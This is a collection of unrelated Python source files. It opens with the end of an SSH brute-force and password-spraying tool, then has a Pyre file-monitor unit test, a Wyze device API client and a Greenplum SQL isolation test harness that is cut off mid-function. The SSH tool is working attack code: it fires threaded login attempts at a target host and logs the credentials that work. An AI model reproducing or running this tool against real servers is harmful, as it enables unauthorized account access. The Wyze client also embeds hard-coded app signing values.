# Help Texts for Arguments
ipaddr_help_text = "Sets IP Address"
port_help_text = "If used; Sets Port [Default: 22]"
timeout_help_text = "If used; Sets SSH Connection timeout (secs) [Default=1]"
qos_help_text = "If used; Exits program on successful credentials"
output_help_text = "If used; Outputs results to file"
verbose_help_text = "If used; Sets Verbosity [Default: False]"
# Add Shared Arguments
input_sub_parser.add_argument('-i', dest="ip_address", metavar='X.X.X.X',
type=str, default=None, required=True, help=ipaddr_help_text)
input_sub_parser.add_argument('-p', dest="protocol_port", metavar='#',
type=int, default=22, required=False, help=port_help_text)
input_sub_parser.add_argument('-t', dest="set_timeout", metavar='#',
type=int, default=1, required=False, help=timeout_help_text)
input_sub_parser.add_argument('-q', dest="quit_on_success", default=False,
required=False, action="store_true", help=qos_help_text)
input_sub_parser.add_argument('-o', dest="output_file", metavar=r'outfile.txt',
type=str, default=None, required=False, help=output_help_text)
input_sub_parser.add_argument('-v', dest="verbose", default=False,
required=False, action="store_true", help=verbose_help_text)
# Brute Forcing Arguments
USERN_HELP_TEXT = "Sets Username to Brute Force"
PASSL_HELP_TEXT = "Sets List of Passwords to Attempt"
LIMIT_HELP_TEXT = "If used; Sets Limit of Password attempts"
WTIME_HELP_TEXT = "If used; Sets Wait time Between Attempts"
brute_force_parser.add_argument('-u', '--username', dest="bf_username", metavar='',
type=str, default=None, required=True, help=USERN_HELP_TEXT)
brute_force_parser.add_argument('-c', '--passlist', dest="bf_passlist", metavar='',
type=str, default=None, required=True, help=PASSL_HELP_TEXT)
brute_force_parser.add_argument('-l', dest="num_of_passw_attempts", metavar='#',
type=int, default=None, required=False, help=LIMIT_HELP_TEXT)
brute_force_parser.add_argument('-w', dest="wait_time_per_attempts", metavar='#',
type=int, default=None, required=False, help=WTIME_HELP_TEXT)
add_parse_arguments(brute_force_parser)
# Password Spraying Arguments
USERL_HELP_TEXT = "Sets List of Users to Password Spray"
PASSW_HELP_TEXT = "Sets Password to Attempt"
passw_spray_parser.add_argument('-u', '--userlist', dest="ps_userlist", metavar='',
type=str, default=None, required=True, help=USERL_HELP_TEXT)
passw_spray_parser.add_argument('-c', '--password', dest="ps_password", metavar='',
type=str, default=None, required=True, help=PASSW_HELP_TEXT)
add_parse_arguments(passw_spray_parser)
# Parse Arguments
pargs = parser.parse_args()
# Initial Functions
def verbosity_checker(verbose_text:str) -> str:
""" Checks if the Verbose Argument is True then Returns Parameter"""
if pargs.verbose is True:
print(verbose_text)
def read_file(file:str) -> list:
"""Reads a File"""
# Open and Read a File
outfile = []
with open(fr'{file}', 'r', encoding="utf-8") as infile:
for line in infile.readlines():
outfile.append(line.rstrip())
return outfile
def output_results(result_to_outfile:str, outfile:str=pargs.output_file) -> str:
"""Outputs results to a file or to the screen"""
if outfile is not None:
with open(str(outfile), "a", encoding="utf-8") as output_file:
output_file.write(result_to_outfile)
return f"[!] INFO: Results written to {output_file}"
return result_to_outfile
# Class SSH Connection
class SSHConnect:
""" Class for SSH Connection """
def __init__(self, username:str=None, password:str=None, ip_address:str=pargs.ip_address,
protocol_port:int=pargs.protocol_port) -> None:
self.username = username
self.password = password
self.ip_address = ip_address
self.protocol_port = protocol_port
self.ssh_client = SSHClient()
self.ssh_client.set_missing_host_key_policy(AutoAddPolicy())
def test_ip_struct(self) -> bool:
"""Checks if string is an IP Address"""
try:
verbosity_checker(Fore.BLUE + f"[!] TASK: Checking if {self.ip_address} is VALID..." + Fore.RESET)
ipaddress.ip_address(self.ip_address)
verbosity_checker(Fore.CYAN + f"[+] INFO: {self.ip_address} is VALID!" + Fore.RESET)
return True
except ValueError:
print(Fore.RED + Back.YELLOW + f"[-] ERROR: Address/Netmask is invalid...Skipping: {self.ip_address}" + Fore.RESET + Back.RESET)
return False
def test_connection(self) -> bool:
""" Testing Connection to Destination """
try:
verbosity_checker(Fore.BLUE + f"[!] TASK: Checking if {self.ip_address} is ALIVE..." + Fore.RESET)
socket.gethostbyaddr(self.ip_address)
verbosity_checker(Fore.CYAN + f"[!] INFO: {self.ip_address} is ALIVE!" + Fore.RESET)
return True
except (socket.error, socket.herror, socket.gaierror, socket.timeout, OSError):
print(Fore.RED + Back.YELLOW + f"[-] ERROR: Could not connect to {self.ip_address}." + Fore.RESET + Back.RESET)
return False
def test_protocol(self) -> bool:
""" Testing if SSH/Port 22 is Open """
try:
verbosity_checker(Fore.BLUE + f"[!] TASK: Checking if PORT ->{self.protocol_port} is OPEN..." + Fore.RESET)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as start_socket:
start_socket.settimeout(pargs.set_timeout)
start_socket.connect((self.ip_address, self.protocol_port))
start_socket.shutdown(socket.SHUT_RDWR)
verbosity_checker(Fore.CYAN + f"[!] INFO: {self.protocol_port} is OPEN!" + Fore.RESET)
return True
except (socket.error, socket.herror, socket.gaierror, socket.timeout, OSError):
print(Fore.RED + Back.YELLOW + f"[-] ERROR: Could not connect to PORT:{self.protocol_port}" + Fore.RESET + Back.RESET)
sys.exit(1)
def ssh_connection(self) -> None:
""" Creating Connection to IP/Port """
try:
self.ssh_client.connect(self.ip_address,self.protocol_port,self.username,self.password)
self.ssh_client.close()
print(Fore.GREEN + f"[+] INFO: Correct USER/PASS Combo: {self.username} : {self.password}" + Fore.RESET)
if pargs.output_file is not None:
output_result = f"{'USERNAME: '}{self.username:<13}{'PASSWORD: '}{self.password}\n"
output_results(output_result)
except AuthenticationException:
verbosity_checker(Fore.RED + f"[-] INFO: Incorrect USER/PASS: {self.username} : {self.password}" + Fore.RESET)
def run(run_username:str, run_password:str) -> None:
""" Main Running """
verbosity_checker(f"[+] TASK: Checking USER/PASS -> {run_username}:{run_password}")
SSHConnect(run_username, run_password).ssh_connection()
def main() -> None:
""" Main Code """
init_obj = SSHConnect()
# Test if everything is VALID or REACHABLE
if init_obj.test_ip_struct() and init_obj.test_connection() and init_obj.test_protocol:
# If Results will written, Create Header
if pargs.output_file is not None:
ip_header_result = f"IP_ADDRESS: {init_obj.ip_address}"
port_header_result = f"PORT: {init_obj.protocol_port}"
ssh_output_header = f"{ip_header_result:<32}{port_header_result}\n"
output_results(ssh_output_header)
# If mode selected is Brute Force Mode
if pargs.passw_finder_mode == "bf":
bf_password_list = read_file(pargs.bf_passlist)
bf_threads = []
if pargs.num_of_passw_attempts is not None and pargs.wait_time_per_attempts is not None:
for index, password in enumerate(bf_password_list):
if index % pargs.num_of_passw_attempts == 0 and index != 0:
time.sleep(pargs.wait_time_per_attempts)
bf_t = Thread(target=run, args = [pargs.bf_username, password], daemon=True)
bf_t.start()
bf_threads.append(bf_t)
else:
for password in bf_password_list:
bf_t = Thread(target=run, args=[pargs.bf_username, password], daemon=True)
bf_t.start()
bf_threads.append(bf_t)
for bf_thread in bf_threads:
bf_thread.join()
# If mode selected is Password Spray Mode
elif pargs.passw_finder_mode == "ps":
ps_username_list = read_file(pargs.ps_userlist)
ps_threads = []
for username in ps_username_list:
ps_t = Thread(target=run, args=[username, pargs.ps_password], daemon=True)
ps_t.start()
ps_threads.append(ps_t)
for ps_thread in ps_threads:
ps_thread.join()
if __name__ == "__main__":
try:
print(Fore.GREEN + display_banner() + Fore.RESET)
start_time = datetime.now()
main()
close_time = datetime.now()
total_time = close_time - start_time
verbosity_checker(Fore.CYAN + f"[!] INFO: Total Execution Time {total_time}" + Fore.RESET)
sys.exit(0)
except (KeyboardInterrupt, OSError):
sys.exit(1)
else:
sys.exit(1)
|
project_files_monitor_test.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-unsafe
import os
import socket
import tempfile
import threading
import unittest
from unittest.mock import MagicMock, patch
from .. import json_rpc, project_files_monitor
from ..analysis_directory import AnalysisDirectory, UpdatedPaths
from ..json_rpc import Request, read_request
from ..process import Process
from ..project_files_monitor import MonitorException, ProjectFilesMonitor
from ..socket_connection import SocketConnection, SocketException
from ..tests.mocks import mock_configuration
class MonitorTest(unittest.TestCase):
@patch.object(SocketConnection, "connect")
@patch.object(json_rpc, "perform_handshake")
# pyre-fixme[56]: Argument `tools.pyre.client.project_files_monitor` to
# decorator factory `unittest.mock.patch.object` could not be resolved in a global
# scope.
@patch.object(project_files_monitor, "find_parent_directory_containing_file")
def test_subscriptions(
self,
find_parent_directory_containing_file,
perform_handshake,
_socket_connection,
) -> None:
find_parent_directory_containing_file.return_value = "/ROOT"
configuration = mock_configuration()
analysis_directory = MagicMock()
analysis_directory.get_root.return_value = "/ROOT"
# no additional extensions
configuration.extensions = []
monitor = ProjectFilesMonitor(configuration, ".", analysis_directory)
self.assertEqual(len(monitor._subscriptions), 1)
subscription = monitor._subscriptions[0]
self.assertEqual(subscription.root, "/ROOT")
self.assertEqual(subscription.name, "pyre_file_change_subscription")
self.assertEqual(subscription.subscription["fields"], ["name"])
self.assertEqual(
subscription.subscription["expression"][0:2], ["allof", ["type", "f"]]
)
self.assertCountEqual(
subscription.subscription["expression"][2],
[
"anyof",
["suffix", "py"],
["suffix", "pyi"],
["suffix", "thrift"],
["match", "TARGETS"],
],
)
# additional extensions
configuration.extensions = ["thrift", "whl"]
monitor = ProjectFilesMonitor(configuration, ".", analysis_directory)
self.assertEqual(len(monitor._subscriptions), 1)
subscription = monitor._subscriptions[0]
self.assertEqual(subscription.root, "/ROOT")
self.assertEqual(subscription.name, "pyre_file_change_subscription")
self.assertEqual(subscription.subscription["fields"], ["name"])
self.assertEqual(
subscription.subscription["expression"][0:2], ["allof", ["type", "f"]]
)
self.assertCountEqual(
subscription.subscription["expression"][2],
[
"anyof",
["suffix", "py"],
["suffix", "pyi"],
["suffix", "thrift"],
["suffix", "whl"],
["match", "TARGETS"],
],
)
# no watchman root -> terminate
find_parent_directory_containing_file.return_value = None
self.assertRaises(
MonitorException,
ProjectFilesMonitor,
configuration,
".",
analysis_directory,
)
def test_bad_socket(self) -> None:
with tempfile.TemporaryDirectory() as root:
bad_socket_path = os.path.join(root, "bad.sock")
socket_connection = SocketConnection(bad_socket_path)
self.assertRaises(SocketException, socket_connection.connect)
@patch.object(ProjectFilesMonitor, "_find_watchman_path")
def test_socket_communication(self, _find_watchman_path) -> None:
# Create a "server" thread to complete the handshake
server_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
errors = []
with tempfile.TemporaryDirectory() as root:
socket_path = os.path.join(root, ".pyre", "server", "json_server.sock")
os.makedirs(os.path.dirname(socket_path))
socket_created_lock = threading.Lock()
socket_created_lock.acquire() # hold lock until server creates socket
def server():
server_socket.bind(socket_path)
server_socket.listen(1)
socket_created_lock.release()
connection, _ = server_socket.accept()
outfile = connection.makefile(mode="wb")
infile = connection.makefile(mode="rb")
request = Request(
method="handshake/server", parameters={"version": "123"}
)
request.write(outfile)
response = read_request(infile)
if not response or response.method != "handshake/client":
errors.append("Client handshake malformed")
return
request = Request(method="handshake/socket_added")
request.write(outfile)
updated_message = read_request(infile)
if (
not updated_message
or updated_message.method != "updateFiles"
or not updated_message.parameters
or updated_message.parameters.get("files")
!= ["/ANALYSIS/a.py", "/ANALYSIS/subdir/b.py"]
):
errors.append("Update message malformed")
server_thread = threading.Thread(target=server)
server_thread.start()
configuration = mock_configuration()
configuration.log_directory = root + "/.pyre"
configuration.extensions = []
configuration.version_hash = "123"
analysis_directory = MagicMock()
analysis_directory.process_updated_files.side_effect = lambda files: UpdatedPaths(
updated_paths=[file.replace("ROOT", "ANALYSIS") for file in files],
deleted_paths=[],
)
# only create the monitor once the socket is open
with socket_created_lock:
monitor = ProjectFilesMonitor(configuration, ".", analysis_directory)
monitor._handle_response(
{"root": "/ROOT", "files": ["a.py", "subdir/b.py"]}
)
analysis_directory.process_updated_files.assert_called_once_with(
["/ROOT/a.py", "/ROOT/subdir/b.py"]
)
server_thread.join()
self.assertEqual(errors, [])
@patch.object(SocketConnection, "connect")
# pyre-fixme[56]: Argument `tools.pyre.client.json_rpc` to decorator factory
# `unittest.mock.patch.object` could not be resolved in a global scope.
@patch.object(json_rpc, "perform_handshake")
@patch.object(ProjectFilesMonitor, "_watchman_client")
@patch.object(ProjectFilesMonitor, "_find_watchman_path")
def test_files_cleaned_up(
self,
_find_watchman_path,
_watchman_client,
perform_handshake,
_socket_connection,
) -> None:
with tempfile.TemporaryDirectory() as root:
configuration = mock_configuration()
configuration.extensions = []
analysis_directory = MagicMock()
analysis_directory.get_root.return_value = root
monitor = ProjectFilesMonitor(configuration, ".", analysis_directory)
monitor._alive = False # never enter watchman loop
monitor._run()
monitor_folder = os.path.join(".pyre", "file_monitor")
self.assertFalse(
os.path.exists(os.path.join(monitor_folder, "file_monitor.lock"))
)
self.assertFalse(
os.path.exists(os.path.join(monitor_folder, "file_monitor.pid"))
)
# pyre-fixme[56]: Argument `os.path` to decorator factory
# `unittest.mock.patch.object` could not be resolved in a global scope.
@patch.object(os.path, "realpath")
def test_socket_connection(self, realpath) -> None:
server_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
with tempfile.TemporaryDirectory() as root:
realpath.side_effect = lambda path: path.replace(
os.path.dirname(path), root # replace parent directories with tempdir
)
# Unix sockets have a limited length of ~100 characters, so the server uses
# symbolic links as a workaround. We need to properly translate these.
socket_link = os.path.join(
".pyre", "long_name" * 15, "server", "json_server.sock"
)
socket_path = os.path.join(root, "json_server.sock")
socket_created_lock = threading.Lock()
socket_created_lock.acquire() # hold lock until server creates socket
def server():
server_socket.bind(socket_path)
server_socket.listen(1)
socket_created_lock.release()
connection, _ = server_socket.accept()
server_thread = threading.Thread(target=server)
server_thread.start()
with socket_created_lock:
SocketConnection(socket_link).connect()
server_thread.join()
|
wyzeapi.py
|
#!/usr/bin/python3
import hashlib
import logging
_LOGGER = logging.getLogger(__name__)
from .wyzeapi_exceptions import WyzeApiError
from .wyzeapi_bulb import WyzeBulb
from .wyzeapi_switch import WyzeSwitch
from .wyzeapi_request_manager import RequestManager
class WyzeApi():
def __init__(self, user_name, password):
self._user_name = user_name
self._password = self.create_md5_md5(password)
self._device_id = "bc151f39-787b-4871-be27-5a20fd0a1937"
self._request_man = RequestManager(self)
self._access_token = None
self.initialize()
# Create device array
self._all_devices = []
def initialize(self):
self._access_token = self.login(self._user_name, self._password, self._device_id)
_LOGGER.info("Retrieved access token")
def create_md5_md5(self, password):
digest1 = hashlib.md5(password.encode('utf-8')).hexdigest()
digest2 = hashlib.md5(digest1.encode('utf-8')).hexdigest()
return digest2
def login(self, username, password, device_id):
url = "https://api.wyzecam.com/app/user/login"
payload = {
"phone_id":device_id,
"app_name":"com.hualai.WyzeCam",
"app_version":"2.6.62",
"sc":"9f275790cab94a72bd206c8876429f3c",
"password":password,
"sv":"41267de22d1847c8b99bfba2658f88d7",
"user_name":username,
"two_factor_auth":"",
"phone_system_type":"1",
"app_ver":"com.hualai.WyzeCam___2.6.62",
"ts":"1575955440030",
"access_token":""
}
data = self._request_man.do_single_threaded_request(url, payload)
try:
access_token = data['data']['access_token']
return access_token
except:
return None
def is_valid_login(self):
if self._access_token == None:
return False
return True
def get_devices(self):
if not self._all_devices:
url = "https://api.wyzecam.com/app/v2/home_page/get_object_list"
payload = {
"phone_system_type":"1",
"app_version":"2.6.62",
"app_ver":"com.hualai.WyzeCam___2.6.62",
"sc":"9f275790cab94a72bd206c8876429f3c",
"ts":"1575953834054",
"sv":"9d74946e652647e9b6c9d59326aef104",
"access_token": self._access_token,
"phone_id": self._device_id,
"app_name":"com.hualai.WyzeCam"
}
data = self._request_man.do_blocking_request(url, payload)
self._all_devices = data['data']['device_list']
return self._all_devices
def list_bulbs(self):
bulbs = []
for device in self.get_devices():
if (device['product_type'] == "Light"):
bulbs.append(WyzeBulb(
self,
device['mac'],
device['nickname'],
("on" if device['device_params']['switch_state'] == 1 else "off")
))
return bulbs
def list_switches(self):
switches = []
for device in self.get_devices():
if (device['product_type'] == "Plug"):
switches.append(WyzeSwitch(
self,
device['mac'],
device['nickname'],
("on" if device['device_params']['switch_state'] == 1 else "off"),
device['product_model']
))
return switches
""" def request_helper(self, url, payload):
r = requests.post(url, headers=self.headers, data=json.dumps(payload))
data = r.json()
if data['code'] != '1':
if data['msg'] == 'AccessTokenError':
_LOGGER.info("Recieved AccessTokenError attempting to regenerate the AccessToken")
self._access_token = None
self.initialize()
else:
raise WyzeApiError(data['msg'])
return data
def do_request(self, url, payload, no_return=False):
if no_return:
x = threading.Thread(target=self.request_helper, args=(url, payload))
x.start()
else:
return self.request_helper(url, payload)
"""
|
sql_isolation_testcase.py
|
"""
Copyright (c) 2004-Present VMware, Inc. or its affiliates.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pg
import pty
import os
import subprocess
import re
import multiprocessing
import tempfile
import time
import sys
import socket
from optparse import OptionParser
import traceback
import select
def is_digit(n):
try:
int(n)
return True
except ValueError:
return False
def null_notice_receiver(notice):
'''
Tests ignore notice messages when analyzing results,
so silently drop notices from the pg.connection
'''
return
class ConnectionInfo(object):
__instance = None
def __init__(self):
self.max_content_id = 0
if ConnectionInfo.__instance is not None:
raise Exception("ConnectionInfo is a singleton.")
query = ("SELECT content, hostname, port, role FROM gp_segment_configuration")
con = pg.connect(dbname="postgres")
self._conn_map = con.query(query).getresult()
con.close()
ConnectionInfo.__instance = self
for content, _, _, _ in ConnectionInfo.__instance._conn_map:
if content >= self.max_content_id:
self.max_content_id = content + 1
@staticmethod
def __get_instance():
if ConnectionInfo.__instance is None:
return ConnectionInfo()
return ConnectionInfo.__instance
@staticmethod
def get_hostname_port(name, role_name):
content_id = int(name)
conn_map = ConnectionInfo.__get_instance()._conn_map
max_content_id = ConnectionInfo.__get_instance().max_content_id
real_content_id = content_id % max_content_id if content_id >= 0 else content_id % (-max_content_id)
for content, host, port, role in conn_map:
if real_content_id == content and role == role_name:
return (host, port)
raise Exception("Cannont find a connection with content_id=%d, role=%c" % (content_id, role_name))
class GlobalShellExecutor(object):
BASH_PS1 = 'test_sh$>'
class ExecutionError(Exception):
""
pass
def __init__(self, output_file='', initfile_prefix=''):
self.output_file = output_file
self.initfile_prefix = initfile_prefix
self.v_cnt = 0
# open pseudo-terminal to interact with subprocess
self.master_fd, self.slave_fd = pty.openpty()
self.sh_proc = subprocess.Popen(['/bin/bash', '--noprofile', '--norc', '--noediting', '-i'],
stdin=self.slave_fd,
stdout=self.slave_fd,
stderr=self.slave_fd,
universal_newlines=True)
self.bash_log_file = open("%s.log" % self.initfile_prefix, "w+")
self.__run_command("export PS1='%s'" % GlobalShellExecutor.BASH_PS1)
self.__run_command("export PS2=''")
self.__run_command("source global_sh_executor.sh")
def terminate(self, with_error = False):
if self.sh_proc == None:
return
# If write the matchsubs section directly to the output, the generated token id will be compared by gpdiff.pl
# so here just write all matchsubs section into an auto generated init file when this test case file finished.
if not with_error and self.initfile_prefix != None and len(self.initfile_prefix) > 1:
output_init_file = "%s.ini" % self.initfile_prefix
cmd = ''' [ ! -z "${MATCHSUBS}" ] && echo "-- start_matchsubs ${NL} ${MATCHSUBS} ${NL}-- end_matchsubs" > %s ''' % output_init_file
self.exec_global_shell(cmd, False)
if self.bash_log_file:
self.bash_log_file.close()
try:
self.sh_proc.terminate()
except OSError as e:
# Ignore the exception if the process doesn't exist.
pass
self.sh_proc = None
def __run_command(self, sh_cmd):
# Strip the newlines at the end. It will be added later.
sh_cmd = sh_cmd.rstrip()
bytes_written = os.write(self.master_fd, sh_cmd.encode())
bytes_written += os.write(self.master_fd, b'\n')
output = ""
while self.sh_proc.poll() is None:
# If not returns in 10 seconds, consider it as an fatal error.
r, w, e = select.select([self.master_fd], [], [self.master_fd], 10)
if e:
# Terminate the shell when we get any output from stderr
o = os.read(self.master_fd, 10240)
self.bash_log_file.write(o)
self.bash_log_file.flush()
self.terminate(True)
raise GlobalShellExecutor.ExecutionError("Error happened to the bash daemon, see %s for details." % self.bash_log_file.name)
if r:
o = os.read(self.master_fd, 10240).decode()
self.bash_log_file.write(o)
self.bash_log_file.flush()
output += o
if o.endswith(GlobalShellExecutor.BASH_PS1):
lines = output.splitlines()
return lines[len(sh_cmd.splitlines()):len(lines) - 1]
if not r and not e:
self.terminate(True)
raise GlobalShellExecutor.ExecutionError("Timeout happened to the bash daemon, see %s for details." % self.bash_log_file.name)
self.terminate(True)
raise GlobalShellExecutor.ExecutionError("Bash daemon has been stopped, see %s for details." % self.bash_log_file.name)
# execute global shell cmd in bash deamon, and fetch result without blocking
def exec_global_shell(self, sh_cmd, is_trip_output_end_blanklines):
if self.sh_proc == None:
raise GlobalShellExecutor.ExecutionError("The bash daemon has been terminated abnormally, see %s for details." % self.bash_log_file.name)
# get the output of shell command
output = self.__run_command(sh_cmd)
if is_trip_output_end_blanklines:
for i in range(len(output)-1, 0, -1):
if len(output[i].strip()) == 0:
del output[i]
else:
break
return output
# execute gobal shell:
# 1) set input stream -> $RAW_STR
# 2) execute shell command from input
# if error, write error message to err_log_file
def exec_global_shell_with_orig_str(self, input, sh_cmd, is_trip_output_end_blanklines):
self.v_cnt = 1 + self.v_cnt
escape_in = input.replace('\'', "'\\''")
# send shell cmd and set the temp RAW_STR
cmd = ''' export RAW_STR%d='%s' && export RAW_STR=$RAW_STR%d && %s ; unset RAW_STR ''' % (
self.v_cnt, escape_in, self.v_cnt, sh_cmd)
return self.exec_global_shell(cmd, is_trip_output_end_blanklines)
# extract shell, sql part from one line with format: @header '': SQL
# return row: (found the header or not?, the extracted shell, the SQL in the left part)
def extract_sh_cmd(self, header, input_str):
start = len(header)
is_start = False
end = 0
is_trip_comma = False
res_cmd = ""
res_sql = ""
input_str = input_str.lstrip()
if not input_str.startswith(header):
return (False, None, None)
for i in range(start, len(input_str)):
if end == 0 and input_str[i] == '\'':
if not is_start:
# find shell begin postion
is_start = True
start = i+1
continue
cnt = 0
for j in range(i-1, 0, -1):
if input_str[j] == '\\':
cnt = 1 + cnt
else:
break
if cnt % 2 == 1:
continue
# find shell end postion
res_cmd = input_str[start: i]
end = i
continue
if end != 0:
# skip space until ':'
if input_str[i] == ' ':
continue
elif input_str[i] == ':':
is_trip_comma = True
res_sql = input_str[i+1:]
break
if not is_start or end == 0 or not is_trip_comma:
raise Exception("Invalid format: %s", input_str)
#unescape \' to ' and \\ to '
res_cmd = res_cmd.replace('\\\'', '\'')
res_cmd = res_cmd.replace('\\\\', '\\')
return (True, res_cmd, res_sql)
class SQLIsolationExecutor(object):
def __init__(self, dbname=''):
self.processes = {}
# The re.S flag makes the "." in the regex match newlines.
# When matched against a command in process_command(), all
# lines in the command are matched and sent as SQL query.
self.command_pattern = re.compile(r"^(-?\d+|[*])([&\\<\\>URSMq]*?)\:(.*)", re.S)
if dbname:
self.dbname = dbname
else:
self.dbname = os.environ.get('PGDATABASE')
# To indicate the session has not been created or terminated.
class SessionError(Exception):
def __init__(self, name, mode, msg):
super(SQLIsolationExecutor.SessionError, self).__init__(msg)
self.name = name
self.mode = mode
class SQLConnection(object):
def __init__(self, out_file, name, mode, dbname, user = None, passwd = None):
self.name = name
self.mode = mode
self.out_file = out_file
self.dbname = dbname
self.user = user
self.passwd = passwd
parent_conn, child_conn = multiprocessing.Pipe(True)
self.p = multiprocessing.Process(target=self.session_process, args=(child_conn,))
self.pipe = parent_conn
self.has_open = False
self.p.start()
# Close "our" copy of the child's handle, so that if the child dies,
# recv() on the pipe will fail.
child_conn.close()
self.out_file = out_file
def session_process(self, pipe):
sp = SQLIsolationExecutor.SQLSessionProcess(self.name,
self.mode, pipe, self.dbname, user=self.user, passwd=self.passwd)
sp.do()
def query(self, command, post_run_cmd = None, global_sh_executor = None):
print(file=self.out_file)
self.out_file.flush()
if len(command.strip()) == 0:
return
if self.has_open:
raise Exception("Cannot query command while waiting for results")
self.pipe.send((command, False))
r = self.pipe.recv()
if r is None:
raise Exception("Execution failed")
if re.match(r"^#.*:", r):
raise SQLIsolationExecutor.SessionError(self.name, self.mode, r)
if post_run_cmd != None:
new_out = global_sh_executor.exec_global_shell_with_orig_str(r.rstrip(), post_run_cmd, True)
for line in new_out:
print(line.rstrip(), file=self.out_file)
else:
print(r.rstrip(), file=self.out_file)
def fork(self, command, blocking, global_sh_executor):
print(" <waiting ...>", file=self.out_file)
self.pipe.send((command, True))
if blocking:
time.sleep(0.5)
if self.pipe.poll(0):
p = self.pipe.recv()
raise Exception("Forked command is not blocking; got output: %s" % p.strip())
self.has_open = True
def join(self):
r = None
print(" <... completed>", file=self.out_file)
if self.has_open:
r = self.pipe.recv()
if r is None:
raise Exception("Execution failed")
print(r.rstrip(), file=self.out_file)
self.has_open = False
def stop(self):
self.pipe.send(("", False))
self.p.join()
if self.has_open:
raise Exception("Should not finish test case while waiting for results")
def quit(self):
print(" ... <quitting>", file=self.out_file)
self.stop()
def terminate(self):
self.pipe.close()
self.p.terminate()
class SQLSessionProcess(object):
def __init__(self, name, mode, pipe, dbname, user = None, passwd = None):
"""
Constructor
"""
self.name = name
self.mode = mode
self.pipe = pipe
self.dbname = dbname
self.passwd = passwd
self.user = user
# If there is an exception thrown when creating session, save it and send
# it to pipe when we get the first execute_command call.
self.create_exception = None
if self.mode == "utility":
(hostname, port) = self.get_hostname_port(name, 'p')
self.con = self.connectdb(given_dbname=self.dbname,
given_host=hostname,
given_port=port,
given_opt="-c gp_role=utility",
given_user=user,
given_passwd=passwd)
elif self.mode == "standby":
# Connect to standby even when its role is recorded
# as mirror. This is useful for scenarios where a
# test needs to promote a standby without using
# gpactivatestandby.
(hostname, port) = self.get_hostname_port(name, 'm')
self.con = self.connectdb(given_dbname=self.dbname,
given_host=hostname,
given_port=port,
given_user=user,
given_passwd=passwd)
elif self.mode == "retrieve":
(hostname, port) = ConnectionInfo.get_hostname_port(name, 'p')
self.con = self.connectdb(given_dbname=self.dbname,
given_host=hostname,
given_port=port,
given_opt="-c gp_retrieve_conn=true",
given_user=user,
given_passwd=passwd)
elif self.mode == "mirror":
# Connect to mirror even when it's role is recorded
# as mirror. This is useful for scenarios where a
# primary is marked down but could actually accept
# connection. This implies utility connection.
(hostname, port) = self.get_hostname_port(name, 'm')
self.con = self.connectdb(given_dbname=self.dbname,
given_host=hostname,
given_port=port,
given_opt="-c gp_role=utility")
else:
self.con = self.connectdb(self.dbname)
def connectdb(self, given_dbname, given_host = None, given_port = None, given_opt = None, given_user = None, given_passwd = None):
con = None
retry = 1000
while retry:
try:
if (given_port is None):
con = pg.connect(host= given_host,
opt= given_opt,
dbname= given_dbname,
user = given_user,
passwd = given_passwd)
else:
con = pg.connect(host= given_host,
port= given_port,
opt= given_opt,
dbname= given_dbname,
user = given_user,
passwd = given_passwd)
break
except Exception as e:
if self.mode == "retrieve" and ("auth token is invalid" in str(e) or "Authentication failure" in str(e) or "does not exist" in str(e)):
self.create_exception = e
break
elif (("the database system is starting up" in str(e) or
"the database system is in recovery mode" in str(e)) and
retry > 1):
retry -= 1
time.sleep(0.1)
else:
raise
if con is not None:
con.set_notice_receiver(null_notice_receiver)
return con
def get_hostname_port(self, contentid, role):
"""
Gets the port number/hostname combination of the
contentid and role
"""
query = ("SELECT hostname, port FROM gp_segment_configuration WHERE"
" content = %s AND role = '%s'") % (contentid, role)
con = self.connectdb(self.dbname, given_opt="-c gp_role=utility")
r = con.query(query).getresult()
con.close()
if len(r) == 0:
raise Exception("Invalid content %s" % contentid)
if r[0][0] == socket.gethostname():
return (None, int(r[0][1]))
return (r[0][0], int(r[0][1]))
def printout_result(self, r):
"""
Print out a pygresql result set (a Query object, after the query
has been executed), in a format that imitates the default
formatting of psql. This isn't a perfect imitation: we left-justify
all the fields and headers, whereas psql centers the header, and
right-justifies numeric fields. But this is close enough, to make
gpdiff.pl recognize the result sets as such. (We used to just call
str(r), and let PyGreSQL do the formatting. But even though
PyGreSQL's default formatting is close to psql's, it's not close
enough.)
"""
widths = []
# Figure out the widths of each column.
fields = r.listfields()
for f in fields:
widths.append(len(str(f)))
rset = r.getresult()
for row in rset:
colno = 0
for col in row:
if col is None:
col = ""
widths[colno] = max(widths[colno], len(str(col)))
colno = colno + 1
# Start printing. Header first.
result = ""
colno = 0
for f in fields:
if colno > 0:
result += "|"
result += " " + f.ljust(widths[colno]) + " "
colno = colno + 1
result += "\n"
# Then the bar ("----+----")
colno = 0
for f in fields:
if colno > 0:
result += "+"
result += "".ljust(widths[colno] + 2, "-")
colno = colno + 1
result += "\n"
# Then the result set itself
for row in rset:
colno = 0
for col in row:
if colno > 0:
result += "|"
if isinstance(col, float):
col = format(col, "g")
elif isinstance(col, bool):
if col:
col = 't'
else:
col = 'f'
elif col is None:
col = ""
result += " " + str(col).ljust(widths[colno]) + " "
colno = colno + 1
result += "\n"
# Finally, the row count
if len(rset) == 1:
result += "(1 row)\n"
else:
result += "(" + str(len(rset)) + " rows)\n"
return result
def execute_command(self, command):
"""
Executes a given command
"""
try:
r = self.con.query(command)
if r is not None:
if type(r) == str:
# INSERT, UPDATE, etc that returns row count but not result set
echo_content = command[:-1].partition(" ")[0].upper()
return "%s %s" % (echo_content, r)
else:
# SELECT or similar, print the result set without the command (type pg.Query)
return self.printout_result(r)
else:
# CREATE or other DDL without a result set or count
echo_content = command[:-1].partition(" ")[0].upper()
return echo_content
except Exception as e:
return str(e)
def do(self):
"""
Process loop.
Ends when the command None is received
"""
(c, wait) = self.pipe.recv()
while c:
if wait:
time.sleep(0.1)
if self.create_exception:
# When parent process received this, it should know the connection has not been
# created. Thus, the process entry should be cleared.
